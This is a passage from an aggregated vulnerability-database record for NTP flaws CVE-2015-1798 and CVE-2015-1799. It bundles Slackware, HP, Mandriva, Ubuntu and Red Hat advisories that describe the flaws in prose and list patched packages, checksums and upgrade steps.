"@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 3.x and 4.x before 4.2.8p2 performs state-variable updates upon receiving certain invalid packets, which makes it easier for man-in-the-middle attackers to cause a denial of service (synchronization loss) by spoofing the source IP address of a peer. NTP Project ntpd reference implementation accepts unauthenticated packets with symmetric key cryptography and does not protect symmetric associations against denial of service attacks. NTP of ntpd of ntp_proto.c Inside receive of symmetric-key The function is used even when a specific invalid packet is received. state variable Service operation disruption to perform update ( Sync failure ) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. http://cwe.mitre.org/data/definitions/17.htmlMan-in-the-middle attacks (man-in-the-middle attack) By the source of the peer IP Denial of service by spoofing addresses ( Sync failure ) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. \nSuccessful exploits may allow the attacker to cause a denial-of-service condition. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p2-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n570bb3e4bb7b065101fa4963e757d7e7 ntp-4.2.8p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ne6add42a70a66496be2d4978370c2799 ntp-4.2.8p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n99f1cfa5e23a256d840ed0a56b7f9400 ntp-4.2.8p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n0a6622196521e084d36cda13fc6da824 ntp-4.2.8p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n28cfe042c585cf036582ce5f0c2daadf ntp-4.2.8p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nc436da55cd2d113142410a9d982c5ac5 ntp-4.2.8p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\ncf69f8ecb5e4c1902dfb22d0f9685278 ntp-4.2.8p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n9c8344ec56d5d2335fd7370e2f9cf639 ntp-4.2.8p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n9dcf0eafa851ad018f8341c2fb9307b5 ntp-4.2.8p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0c063f4e46a72ec86012a46299a46df ntp-4.2.8p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n5f72de16e3bb6cd216e7694a49671cee n/ntp-4.2.8p2-i486-1.txz\n\nSlackware x86_64 -current package:\n1ba531770e4a2ae6e8e7116aaa26523e n/ntp-4.2.8p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p2-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nRelease Date: 2015-05-19\nLast Updated: 2015-05-19\n\nPotential Security Impact: Remote Denial of Service (DoS), or other\nvulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nNTP. These could be exploited remotely to create a Denial of Service (DoS),\nor other vulnerabilities. \n\nReferences:\n\nCVE-2015-1798 - Symmetric-Key feature allows MAC address spoofing (CWE-17)\nCVE-2015-1799 - Symmetric-Key feature allows denial of service (CWE-17)\nSSRT102029\nCERT-VU#852879\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.31 running NTP v4.x, specifically version C.4.2.6.5.0 or previous\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-1798 (AV:A/AC:H/Au:N/C:N/I:P/A:N) 1.8\nCVE-2015-1799 (AV:A/AC:M/Au:N/C:N/I:P/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following solution for HP-UX B.11.31. \n\nA new B.11.31 depot for HP-UX-NTP_C.4.2.6.6.0 is available here:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPUX-NTP\n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nMANUAL ACTIONS: Yes - Update\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.6.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 May 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \nComware 7 (CW7) Products - all versions prior to the fixed versions in the\nResolution section below. \n\n + **12500 (Comware 7) - Version: Fix in R7375**\n * HP Network Products\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JC072B HP 12500 Main Processing Unit\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n - JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit\n\n + **10500 (Comware 7) - Version: Fix in R7169P01**\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA w/Comware v7 OS MPU\n\n + **12900 (Comware 7) - Version: Fix in R1137**\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n\n + **5900 (Comware 7) - Version: Fix in R2422P01**\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n - JG296A HP 5920AF-24XG Switch\n - JG555A HP 5920AF-24XG TAA Switch\n\n + **MSR1000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n\n + **MSR2000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n\n + **MSR3000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n\n + **MSR4000 (Comware 7) - Version: Fix in R0106P33**\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n\n + **5800 (Comware 7) - Version: Fix in R7006P15**\n * HP Network Products\n - JC099A HP 5800-24G-PoE Switch\n - JC099B HP 5800-24G-PoE+ Switch\n - JC100A HP 5800-24G Switch\n - JC100B HP 5800-24G Switch\n - JC101A HP 5800-48G Switch with 2 Slots\n - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n - JC103A HP 5800-24G-SFP Switch\n - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n - JC104A HP 5800-48G-PoE Switch\n - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n - JC105A HP 5800-48G Switch\n - JC105B HP 5800-48G Switch with 1 Interface Slot\n - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n - JG255A HP 5800-24G TAA-compliant Switch\n - JG255B HP 5800-24G TAA-compliant Switch\n - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface\n - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface\n - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\n - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\n - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n - JG225A HP 5800AF-48G Switch\n - JG225B HP 5800AF-48G Switch\n - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n - JG219A HP 5820AF-24XG Switch\n - JG219B HP 5820AF-24XG Switch\n - JC102A HP 5820-24XG-SFP+ Switch\n - JC102B HP 5820-24XG-SFP+ Switch\n\n + **VSR (Comware 7) - Version: Fix in E0321**\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n\n + **7900 (Comware 7) - Version: Fix in R2137**\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n\n + **5130 (Comware 7) - Version: Fix in R3109P05**\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n\n + **5700 (Comware 7) - Version: Fix in R2422P01**\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n\n + **5930 (Comware 7) - Version: Fix in R2422P01**\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n\nHISTORY\nVersion:1 (rev.1) - 8 March 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n b0f98e6b8700e3e3413582fe28d1ba06 mbs1/x86_64/ntp-4.2.6p5-8.4.mbs1.x86_64.rpm\n d864780718c95368bf9ec81643e35e5d mbs1/x86_64/ntp-client-4.2.6p5-8.4.mbs1.x86_64.rpm\n 6f457df52d46fb8e6b0fe44aead752eb mbs1/x86_64/ntp-doc-4.2.6p5-8.4.mbs1.x86_64.rpm \n b4bff3de733ea6d2839a77a9211ce02b mbs1/SRPMS/ntp-4.2.6p5-8.4.mbs1.src.rpm\n\n Mandriva Business Server 2/X86_64:\n e9ac2f3465bcc50199aef8a4d553927f mbs2/x86_64/ntp-4.2.6p5-16.3.mbs2.x86_64.rpm\n cf2970c3c56efbfa84f964532ad64544 mbs2/x86_64/ntp-client-4.2.6p5-16.3.mbs2.x86_64.rpm\n 1ae1b1d3c2e7bdea25c01c33652b6169 mbs2/x86_64/ntp-doc-4.2.6p5-16.3.mbs2.noarch.rpm \n d250433009fd187361bda6338dc5eede mbs2/SRPMS/ntp-4.2.6p5-16.3.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. ============================================================================\nUbuntu Security Notice USN-2567-1\nApril 13, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. This issue could either cause ntp-keygen to hang, or\ncould result in non-random keys. (CVE number pending)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.3\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.3\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.4\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2231-04\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html\nIssue date: 2015-11-19\nCVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 \n CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 \n CVE-2015-3405 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nIt was found that because NTP\u0027s access control was based on a source IP\naddress, an attacker could bypass source IP restrictions and send\nmalicious control and configuration packets by spoofing ::1 addresses. \n(CVE-2014-9298, CVE-2014-9751)\n\nA denial of service flaw was found in the way NTP hosts that were peering\nwith each other authenticated themselves before updating their internal\nstate variables. An attacker could send packets to one peer host, which\ncould cascade to other peers, and stop the synchronization process among\nthe reached peers. (CVE-2015-1799)\n\nA flaw was found in the way the ntp-keygen utility generated MD5 symmetric\nkeys on big-endian systems. An attacker could possibly use this flaw to\nguess generated MD5 keys, which could then be used to spoof an NTP client\nor server. (CVE-2015-3405)\n\nA stack-based buffer overflow was found in the way the NTP autokey protocol\nwas implemented. When an NTP client decrypted a secret received from an NTP\nserver, it could cause that client to crash. (CVE-2014-9297, CVE-2014-9750)\n\nIt was found that ntpd did not check whether a Message Authentication Code\n(MAC) was present in a received packet when ntpd was configured to use\nsymmetric cryptographic keys. A man-in-the-middle attacker could use this\nflaw to send crafted packets that would be accepted by a client or a peer\nwithout the attacker knowing the symmetric key. (CVE-2015-1798)\n\nThe CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav\nLichv\u00e1r of Red Hat. \n\nBug fixes:\n\n* The ntpd service truncated symmetric keys specified in the key file to 20\nbytes. As a consequence, it was impossible to configure NTP authentication\nto work with peers that use longer keys. With this update, the maximum key\nlength has been changed to 32 bytes. (BZ#1191111)\n\n* The ntpd service could previously join multicast groups only when\nstarting, which caused problems if ntpd was started during system boot\nbefore network was configured. With this update, ntpd attempts to join\nmulticast groups every time network configuration is changed. (BZ#1207014)\n\n* Previously, the ntp-keygen utility used the exponent of 3 when generating\nRSA keys. Consequently, generating RSA keys failed when FIPS mode was\nenabled. With this update, ntp-keygen has been modified to use the exponent\nof 65537, and generating keys in FIPS mode now works as expected. \n(BZ#1191116)\n\n* The ntpd service dropped incoming NTP packets if their source port was\nlower than 123 (the NTP port). With this update, ntpd no longer checks the\nsource port number, and clients behind NAT are now able to correctly\nsynchronize with the server. (BZ#1171640)\n\nEnhancements:\n\n* This update adds support for configurable Differentiated Services Code\nPoints (DSCP) in NTP packets, simplifying configuration in large networks\nwhere different NTP implementations or versions are using different DSCP\nvalues. (BZ#1202828)\n\n* This update adds the ability to configure separate clock stepping\nthresholds for each direction (backward and forward). Use the \"stepback\"\nand \"stepfwd\" options to configure each threshold. (BZ#1193154)\n\n* Support for nanosecond resolution has been added to the Structural\nHealth Monitoring (SHM) reference clock. Prior to this update, when a\nPrecision Time Protocol (PTP) hardware clock was used as a time source to\nsynchronize the system clock, the accuracy of the synchronization was\nlimited due to the microsecond resolution of the SHM protocol. The\nnanosecond extension in the SHM protocol now allows sub-microsecond\nsynchronization of the system clock. (BZ#1117702)\n\nAll ntp users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1117702 - SHM refclock doesn\u0027t support nanosecond resolution\n1122012 - SHM refclock allows only two units with owner-only access\n1171640 - NTP drops requests when sourceport is below 123\n1180721 - ntp: mreadvar command crash in ntpq\n1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1\n1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated\n1191108 - ntpd should warn when monitoring facility can\u0027t be disabled due to restrict configuration\n1191122 - ntpd -x steps clock on leap second\n1193154 - permit differential fwd/back threshold for step vs. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\naarch64:\nntp-4.2.6p5-22.el7.aarch64.rpm\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nntpdate-4.2.6p5-22.el7.aarch64.rpm\n\nppc64:\nntp-4.2.6p5-22.el7.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nntpdate-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nntpdate-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nntpdate-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 